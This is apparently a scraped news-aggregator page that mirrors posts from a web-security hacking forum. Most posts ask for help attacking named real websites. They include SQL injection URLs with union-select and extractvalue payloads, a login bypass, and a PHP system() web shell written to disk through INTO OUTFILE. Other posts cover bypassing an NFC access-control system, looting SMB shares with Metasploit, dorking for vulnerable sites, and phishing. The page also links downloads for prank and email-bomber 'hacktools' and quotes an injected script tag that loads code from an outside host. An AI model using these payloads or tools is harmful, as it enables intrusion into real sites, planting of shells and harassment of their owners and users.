Warning: fwrite() expects parameter 1 to be resource, boolean given in /var/www/www.schuirink.net/www/xml/headlines.php on line 383

Warning: fclose() expects parameter 1 to be resource, boolean given in /var/www/www.schuirink.net/www/xml/headlines.php on line 384
sla.ckers.org @ the web & the world :: hundreds of fresh newsfeeds on schuirink.net
schuirink.net
main destinations: home | the web & the world | out of here
Google

news headlines

News headlines collected from 498 newsfeeds.

sla.ckers.org | The Web Application Security Forums

url: http://sla.ckers.org

any usefull auto database? (no replies)


Hi,

Does anyone knows of any usefull automotive database?

Hacked, cracked, etc

dom xss is possible ? (no replies)


dom xss is possible in ie browsers in code ?
<html>
<head>
<script language="JavaScript">
function onLoad() {
parent.setTimeout("zk.bmk.onIframeLoaded('"+window.location+"')",0);
}
</script>
</head>
<body onload="onLoad()">
</body>
</html>

is located in http://grepcode.com/file/repo1.maven.org/maven2/org.zkoss.zk/zk/6.5.1.1/web/js/zk/bookmark.html


in ie8 browser injection in url ');// error message zk undefined, bmk null or undefined.
How is reproduce injection dom xss ?

The sql injection (no replies)


For this sql injection,how to bypass IT?

http://www.premises.com.au/residetails.php?id=6140725


http://www.premises.com.au/residetails.php?id=6140725'

NFC Security (no replies)


Hi guys,
I was redirected here by a friend, to ask few question I hope this thread can be not a once reply topic but a section were we'll disscuss about security in NFC Tags and Readers.
He tried to anwser few of my questions but hope for another anwsers.

I'm a 20 year old student, and my as my homework I got NFC security.
Before I start, let me tell you about my equipment, own this device and a tag (actually 3, tag the paper, a key, and a card).

w w w. s8.postimg.org/aek39k2it/photo1.jpg

Now my "homework" is to find a security hole/try to break it/ in school where the system is setuped as that the tag reader identifys a tag by ID of the tag and if the tag is located in the database it allows access to the room.

I need to get into it without knowing any tags, actually I know the, but thats not the point.

~Can NFC Tag ID be changed or can it be controled by a script ?
~ If so how ?

~Can I bruteforce NFC reader using HCE NFC phone / device ?
~ If so how ?

~Does the reader that I have ACS.com.hk manifacture ACR122 Keep logs ?
(tried to find out but without success)

That is for beggining hope you guys will help me with my study, would appriciate it very much.

Identify base64 looking text (no replies)


Hi,
while searching for injection points I came across a base64-type looking argument to id param. Can anyone help me identify what is it exacctly how to decode/encode it. It ain't base64, It tried decoding it.

http://u.laaptu.com/login1.action?id=0mYOgRQ6Hqmry/ianstwtUOz5SJOVqi59VoLNz0uwSE=

Exploitable (no replies)


Hi guys can you give me the status of this parameter ?

http://www.bhtelecom.ba/laptopi-detalji.html?&tx_ssgenericrenderer_pi1[uid]=12

edit smb_relay.rb (no replies)


Hello,
I have been trying to figure out how to modify the smb_relay.rb metasploit module to use the same session that is created for uploading a payload to a share, and use it to download all files in the share to /tmp/loot has anyone done this before? any help would be much appreciated. Thank you.

Change user (2 replies)


Is it possible to change user using sql injection ?
So you can get privilages ?

Greetings (1 reply)


Hello all,
I'm an unprofessional pentester/blackhat for hire who's looking to share knowledge and expand my current social circle with other knowledgeable people in the field, power in numbers y'know?

It's a pity this forum looks slightly dead for the current time, I hope that will change.

Cheers,
nopesled

injection alters javascript file (1 reply)


OK here's the dealio, I am asked to code a bookings page for a taxi firm I used to work for using PHP/mySQL. The owner won't pay much so I don't sanitize user input etc and generally do a half arsed job hoping, maybe, that i'll be asked back to do some more work on it and get paid more.
Well it kinda works out for me as some attacker manages to re-write an included javascript file so that it does this (appended to the included js file):
document.write('<script type="text/javascript" src="http://www.kyasshingu-shinsa-a1.asia/7nqth9gv.php?id=100737776"></script>');

So my question is this. How did he/she (the attacker) alter this file?
did they get the ftp password? if so how? what other avenues did/could they use to alter this file?

The js file only provided form validation, cvhecking if boxes were filled in etc.

P.S I won't be so negelectful in future even though I did get paid extra for sorting my own mess out!

Thanks for any insights in advance.

h! iam lggoloza (1 reply)


iam lggoloza from the china

be good at: Xss. linux Kernel driver. intranet penetration

Namaste! (1 reply)


Namaste, everyone,am new here,can anyone help me in Phishing!

another one (no replies)


http://www.recreatingeden.com/index.php?pid=8+order+by+5--+

i dont have permission ?_?

why this 400 bad request?? (5 replies)


order by and union all select works

but injections to retrieve data not^^ why?

http://www.piemontfungo.com/store/index.php?prod=1888+union+all+select+1,group_concat%28table_name%29,3,4,5,6,7,8,9,10,11,12+from+information_schema.tables+where+table_schema=database%28%29

i need to refresh my memory... (2 replies)


omg i need to remember some sqlinj^^

http://www.pubblicitafaidate.it/index.php?prod=96

easy inj for some of u^^ (no replies)


http://www.geldue.it/site/index.php?prod=1&cat=Prodotti%20Complementari%27

help

Breaking out of JS String Assignment? (no replies)


I have a user controlled JavaScript string which is assigned to a variable, e.g.

var s = '(my input)';

Only three characters are converted: ' < and >

< and > are replaced with < and > , respectively.

The single quote (' / %27) is replaced with

' + "'" + '

For example, an input of

a'b

will result in

var s = 'a' + "'" + 'b';

and an input of 'aa'bb' will result in

var s = '' + "'" + 'aa' + "'" + 'bb' + "'" + '';


\ and / are neither converted nor escaped, so I can insert things like \u0022 or \n and I can escape the trailing ' in the string assignment.

For example, I can insert 123\ which will result in

var s = '123\';

This breaks the JavaScript syntax but does not allow me to inject code that will be interpreted.

Any ideas how to break out?

finding sql vulnerable (2 replies)


hi all i'am finaly back :P

My question is more about how to find vulnerability website than how to hack it .

For exemple from now i use the dork

Inurl:productdetail.php?id=

for find website vulnerable to sql

and after finish the google list i try :

inurl:productdetail.php?id= intext:lord of ring

for find new website.

My problem is that nom i can write everything i whant in "intext" i still get the same website, not in the same order by all time the same

I try with other dork like :

inurl:index.php?id=

Once the list is down i do like before :

Inurl:index.php?id= intext:star wars

But like for productdetail.php?id= i got similare result just not in the same order ...

As you can see i mostly search for shop that is find more interesting for sql

So is there something i do wrong ? Or maybe there is other way to find websites?

Hola all (1 reply)


Hello everybody. I am Mg Ar Kr. Nice to meet u all and I am new at here.

I intrest in SQLi, XSS most.

Have a nice day :)

./end

Symfony 2.4 Security (no replies)


Guys you have any experience with symfony 2.4 any security vulnerabilities you are fimiliar with, what to be carefull about?

Regards

how to getshell (1 reply)


for this:
this can get data,but how to getshell
id=99 and extractvalue(1, concat(0x5c, (select datanase())))--

can't this
id=99 and extractvalue(1, concat(0x5c, (select '<?php system($_GET[1]);?>' into oufile '/var/www/god.php')))--

extractvalue() how to exploit "select into outfile" getshell

USSD Sender Hacktool 1.1 (2 replies)


What is USSD?
USSD stands for Unstructured Supplementary Service Data and it's mostly use to make requests to a mobile operator. If
you want to check how much money you have on your mobile sim card you can use a USSD Command for that. Entering for
example *#100# to the vodafone network, you will receive an USSD message as a result.

USSD Sender Hacktool is a complex tool that let any web user to send a text message in a USSD command to any number. By
default the message is "You have been hacked!" but you can send any text. In the target phone a message will pop up
with the text and a OK button. If it get's undelivered an actual sms will be send.

Virustotal:
https://www.virustotal.com/en/file/a22e6d2879479d41a01591a925bea2efe49ddd07a91880f4f642f306d5a8eb55/analysis/1397761754/

MailChimp Email Bomber 1.0 source (1 reply)


This app will send mail to your mailbox. Win the possibility of winning $5.00 dollars by paypal just by sending an email to privateloader@iol.pt

Download:
http://www.datafilehost.com/d/dcd700c6

Virustotal:
https://www.virustotal.com/en/file/1e31051b968a011da2cdfe78cf69fdb8f23a5149a90e1ad3c6f36e1b31811c2a/analysis/1397759634/

CSRF -- Add extra cookie value (1 reply)


Hello All,
I am trying to demonstrate weak CSRF token implementation.
The request structure is something similar to following:

POST /abc HTTP/1.1

Cookie = JSESSIONID=xxxxxxx ; Token = yyyyyyyy

somename= somevalue
token = yyyyyyyy


The token value is not random and can be easily guessed.


We can control "token=" in POST body but we also need to change "token=" value from Cookies: to make both values identical.

I tried to set extra cookie parameter using php, JS but that parameter not getting inserted in actual CSRF request when user clicks on submit button.

Any suggestions?

who can bypass this (no replies)


http://ysts.39yst.com/2012/ login have mysql injection

but only get some data,who can bypass this and select into outfile getshell

MySQL Query : SELECT * FROM `pre_ucenter_members` WHERE `username`='1111' AND EXTRACTVALUE(4905,CONCAT(0x5c,0x7161757671,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x717a666571)) AND 'YiBx'='YiBx'
MySQL Error : XPATH syntax error: '\qauvq39yst_com_bbs_v2qzfeq'
MySQL Errno : 1105
Message : MySQL Query Error

strange xpath injection unable to get through it (2 replies)


Hi,

Can any one give it a try .

http://urdu.dunyanews.tv/index.php/ur/Technology/217022%20and%20extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29--


Looking forward for your kind response.


Regards
Net_Spy

Free Stuff on the mail (2014) (1 reply)


Get all kind of free stuff directly into your mailbox. No hustles or problems of any kind.
Give a mail worker some jobs

Download:
http://www.firedrive.com/file/3FD109426910C41C

Mobile Prank Hacktool 3.6 - Make Pranks to Any one (1 reply)


Mobile Prank Hacktool - A tool to send SMS & Call Pranks to any mobile number.
In version 3.6 you can prank members of the Europen Parlament

Download:
http://www.firedrive.com/file/92D1E8E1AE53DC8D

Virustotal:
https://www.virustotal.com/en/file/cf5c372f6ac22ce2edfd8d22c6de44eb501f626eb6d84f74c1c138183918b9c9/analysis/1396436839/

Vulnerable but doesn't work (1 reply)


Hi all,

this url is vulnérable : (POST)

http://www.hestia.fr/login.php
with data :
login=1&action=logue_in&code='&mdp='

i try this :
login=1&action=logue_in&code='||'a'='a&mdp='||1 limit 0,1;#

but i can't connect as a user :( what's wrong ?

any idea ?

Mobile Prank Hacktool 3.5 (no replies)


Download:
http://www.firedrive.com/file/4747D63A7EB49982

Virustotal:
https://www.virustotal.com/en/file/d33f7a94fbcbbc6dadb219b973d8c908c4cb6ac6b1a1305fb458b08113d2694f/analysis/1395840091/